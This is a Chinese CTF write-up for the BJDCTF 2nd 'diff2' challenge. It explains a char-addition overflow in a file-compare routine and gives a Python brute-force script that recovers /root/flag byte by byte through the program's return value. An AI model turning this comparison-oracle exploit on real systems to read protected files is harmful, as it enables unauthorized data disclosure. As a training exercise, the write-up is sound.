[BJDCTF 2nd] diff2
题目下载地址:点此下载
这里存在溢出漏洞
![[BJDCTF 2nd] diff2_第1张图片](http://img.e-com-net.com/image/info8/52405d6915624b4582f3cd1bb56caad9.jpg)
一般师傅:char + char = char 没毛病 keer师傅:char + char = 溢出!怼他!
我们知道char型变量占1个字节,相当于unsigned byte,表示范围是0x0-0xff,那么两char相加的范围就是0x0 - 0x1fe ,可是char型只能存储1个字节的数据,因此两char相加产生的进位就会被忽略。举个栗子,0x7d+0x83=0x100->0x0。get到了这一点,再看for循环条件,就能看出些端倪了。
buf2[i] + buf1[i] = 0x100 时会终止for循环,并且返回0。按程序正常的流程走,除非buf1和buf2完全相同,否则不可能返回0,而现在只要buf1和buf2任意位置对应的字节相加等于0x100,compare也会返回0。
from subprocess import *
fix = ''
while 1:
for i in range(0x100):
payload = fix+chr(i)
with open('/tmp/ktql','w+') as f:
f.write(payload)
p = Popen(['/root/diff','/tmp/ktql','/root/flag'],stdout=PIPE)
res = p.stdout.read()
if res != '1':
fix+=chr(0x100-i)
print(fix)
break